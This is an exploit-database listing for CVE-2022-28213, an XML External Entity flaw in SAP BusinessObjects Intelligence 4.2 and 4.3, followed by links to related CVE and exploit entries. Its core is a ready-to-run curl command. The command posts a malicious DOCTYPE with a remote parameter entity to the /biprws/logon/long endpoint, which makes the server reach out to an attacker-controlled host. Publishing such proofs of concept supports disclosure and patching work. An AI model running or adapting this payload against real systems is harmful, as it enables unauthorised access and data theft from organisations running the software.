Lucene search
West Shepherd1337DAY-ID-37702HistoryMay 11, 2022 - 12:00 a.m.
SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE) Vulnerability
2022-05-1100:00:00
West Shepherd
0day.today
91
# Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
# Google Dork: N/A
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.sap.com/
# Software Link: https://www.sap.com/
# Version: 4.2 and 4.3
# Tested on: Windows Server 2019 x64
# CVE : CVE-2022-28213
# References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md
curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \
--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY %
remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \
https://example.com/biprws/logon/long
Related
prion
prion
Code injection
2022-04-12 17:15:00
cvelist
cvelist
CVE-2022-28213
2022-04-12 16:11:27
cve
cve
CVE-2022-28213
2022-04-12 17:15:00
packetstorm
packetstorm
SAP BusinessObjects Intelligence 4.3 XML Injection
2022-05-11 00:00:00
exploitdb
exploitdb
SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
2022-05-11 00:00:00